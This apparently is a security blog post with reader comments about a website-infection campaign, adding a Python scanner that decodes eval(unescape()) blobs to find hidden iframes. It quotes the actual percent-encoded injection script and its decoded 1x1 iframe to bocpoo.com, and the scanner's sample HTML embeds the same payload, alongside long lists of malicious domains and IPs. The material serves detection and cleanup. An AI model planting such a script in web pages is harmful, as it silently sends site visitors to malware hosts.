

This is a short post about one of the ongoing attacks. It injects the following script, usually at the very bottom of the HTML:
<s cript>e val(unescape('%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%27%3C%69%66%72%61%6D%65%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%62%6F%63%70%6F%6F%2E%63%6F%6D%2F%3F%37%30%35%38%39%30%22%20%77%69%64%74%68%3D%31%20%68%65%69%67%68%74%3D%31%3E%3C%2F%69%66%72%61%6D%65%3E%27%29'));</script><!-- uy7gdr5332rkmn -->
This script can be detected by Unmask Parasites.
Once executed, this code injects the following hidden iframe
<i frame src="http://bocpoo.com/?705890" width=1 height=1></iframe>
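The obfuscation in this campaign is just percent-encoding wrapped in eval(unescape(...)), so a site owner can decode it and pull out the iframe target without running any JavaScript. The scanner below is an added example written for this post; it is not Unmask Parasites code. It replicates JavaScript's unescape(), finds every eval(unescape('...')) blob in a page, decodes it, and reports each iframe the decoded code writes, flagging the 1x1 "hidden iframe" trick. The sample HTML is constructed here, with the encoded payload copied from the injected script above; the function and variable names are this example's own.

```python
import re
from urllib.parse import unquote, urlparse

# Obfuscation pattern used by this campaign: eval(unescape('%xx%xx...'))
EVAL_UNESCAPE_RE = re.compile(
    r"eval\s*\(\s*unescape\s*\(\s*'((?:%u[0-9A-Fa-f]{4}|%[0-9A-Fa-f]{2})+)'\s*\)\s*\)",
    re.IGNORECASE,
)
# Each <iframe ...> tag inside the decoded payload
IFRAME_TAG_RE = re.compile(r"<iframe\b[^>]*>", re.IGNORECASE)
# The src attribute of a tag (quoted or bare)
SRC_ATTR_RE = re.compile(r"\bsrc\s*=\s*[\"']?([^\"'\s>]+)", re.IGNORECASE)
# width/height of 0 or 1 is the hidden-iframe trick; (?![0-9]) stops "10" matching
TINY_DIM_RE = re.compile(r"\b(?:width|height)\s*=\s*[\"']?[01](?![0-9])", re.IGNORECASE)

# Constructed sample page: a clean document plus the injected script from this post
SAMPLE_HTML = (
    "<html><body><h1>Example site</h1><p>Normal content.</p></body></html>\n"
    "<script>eval(unescape('%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%27%3C%69%66"
    "%72%61%6D%65%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%62%6F%63%70%6F%6F%2E%63%6F%6D"
    "%2F%3F%37%30%35%38%39%30%22%20%77%69%64%74%68%3D%31%20%68%65%69%67%68%74%3D%31%3E"
    "%3C%2F%69%66%72%61%6D%65%3E%27%29'));</script><!-- uy7gdr5332rkmn -->"
)


def js_unescape(encoded):
    """Replicate JavaScript unescape(): %uXXXX is a UTF-16 code unit, %XX a Latin-1 byte."""
    with_unicode = re.sub(
        r"%u([0-9A-Fa-f]{4})", lambda m: chr(int(m.group(1), 16)), encoded
    )
    # unquote() handles the remaining %XX escapes; latin-1 keeps the byte-to-char mapping
    return unquote(with_unicode, encoding="latin-1")


def find_injected_iframes(html):
    """Decode every eval(unescape()) blob in html and list the iframes it would write.

    Returns a list of dicts with keys: host, src, hidden, decoded.
    """
    findings = []
    for match in EVAL_UNESCAPE_RE.finditer(html):
        decoded = js_unescape(match.group(1))
        for tag in IFRAME_TAG_RE.findall(decoded):
            src_match = SRC_ATTR_RE.search(tag)
            if not src_match:
                continue
            src = src_match.group(1)
            findings.append({
                "host": urlparse(src).hostname,
                "src": src,
                "hidden": bool(TINY_DIM_RE.search(tag)),
                "decoded": decoded,
            })
    return findings


if __name__ == "__main__":
    for finding in find_injected_iframes(SAMPLE_HTML):
        marker = "HIDDEN " if finding["hidden"] else ""
        print(f"{marker}iframe -> {finding['host']}  ({finding['src']})")
        print("decoded payload:", finding["decoded"])
```

Run it over a saved copy of a page (for example the output of `curl -s` or a file pulled from the server over SFTP) and compare the reported hosts against the domain list in this post; the host, not the full URL, is what to match on, since the query string changes between infections.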
On Google’s diagnostics pages of infected sites you’ll see words like:
Malicious software is hosted on 2 domain(s), including geezter .com/, bocpoo .com/.
1 domain(s) appear to be functioning as intermediaries for distributing malware to visitors of this site, including bocpoo .com/.
This attack uses many different domain names (the script content changes accordingly): artode .com, astnop .com, awotbop .com, baaswer .com, bedfer .com, biawwer .com, bocpoo .com, cedfer .com, chutnot .com, qawfer .com, geezter .com, minpoo.com, podfer .com, pukfer .com, redpoo .com, verfer.com, iseyh .com. All these domain names point to the IP address 121 .156 .57 .184, a server in South Korea (Korea Telecom). The domains are registered by Igor Nikenin from Rostov na Donu, Russia (this info may be fake).
A preliminary review of hacked sites makes me think that this attack uses stolen FTP credentials. Although I don't have strong evidence at this point, it's always a good idea to scan computers that have access to hacked websites for malware and then change all site passwords. Refrain from saving passwords in FTP clients, and use secure protocols (SFTP or FTPS) instead of FTP, which transfers passwords in plain text.
If you know more information about this attack please share it in the comments section below.










[...] This post was mentioned on Twitter by Denis, Rhonda Kreklau. Rhonda Kreklau said: Geezter, Qawfer and Other Malicious Iframes From 12_156 _57_184 – Unmask Parasites blog – http://tinyurl.com/2egr75q [...]
More malicious domains:
naurup .com
saspoo .com
Another IP address is 121 .156 .57 .185, besides 121 .156 .57 .184. All malicious domains are: artode.com, astnop.com, bawset.com, bedfer.com, bedret.com, bocpoo.com, cedfer.com, cerpoo.com, goapoo.com, kevfer.com, kiwdor.com, lowtip.com, minpoo.com, nunpoo.com, oportwe.com, podfer.com, pukfer.com, qawfer.com, qiamhot.com, redpoo.com, saspoo.com, sedfer.com, sedpoo.com, verfer.com, wasplac.com, wazxer.com, xedfer.com, xedpoo.com, aferup.com, ajirup.com, astped.com, blidhu.com, cutped.com, daiehu.com, dainhu.com, dsionhu.com, eainhu.com, edsinhu.com, exdshu.com, iainhu.com, jikped.com, jorped.com, laarup.com, mokaped.com, naerup.com, naurup.com, nsishu.com, oisrup.com, outped.com, padrup.com, quaped.com, qutped.com, sienhu.com, silrup.com, tivped.com, todped.com, and uaerup.com (IP address 121.156.57.184), and biawwer.com, nuahnd.com, giaine.com, ksinne.com, ainerg.com, awotbop.com, geezter.com, baaswer.com, liaefr.com, wsinfr.com, aierfr.com, urinoor.com, naieerr.com, hianes.com, siinns.com, hinnws.com, niaekw.com, asonie.com, cdeinaa.com, chutnot.com, deetcor.com, gfinee.com, nasettg.com, neebver.com, nsieew.com, puntbar.com, sinesr.com, switbop.com, xeelpot.com, and zuubnot.com (IP address 121.156.57.185). I saw that whole list on MalwareURL (malwareurl.com).
Another domain from 121.156.57.185 is pnaidc.com.
Sorry, I meant xetpoo.com, not xedpoo.com.
Also from 121.156.57.185: aniess.com, butdt.com, dinwoo.com, einsien.com, gredet.com, horewdt.com, huffdt.com, and geerrge.com.
Not only these, but also vinaie.com.
Other domains are biarcm.com, guytin.com, kjdqein.com, msiane.com, and nupner.com.
Before aferup.com on the top list (IP 121.156.57.184), I meant to list aedrup.com.
Also iseyh.com, basyh.com, and cattww.com.
I also add gbimd.com.
Also aesyh.com, diayh.com, esiyh.com, eysyh.com, idnyh.com, oinyh.com, ppiyh.com, and woiyh.com.
New attacks are from 10 .net domains, which are: aeined.net, eadied.net, haeied.net, huaned.net, kaieed.net, laiaed.net, pidied.net, roaaed.net, verred.net, and wodied.net.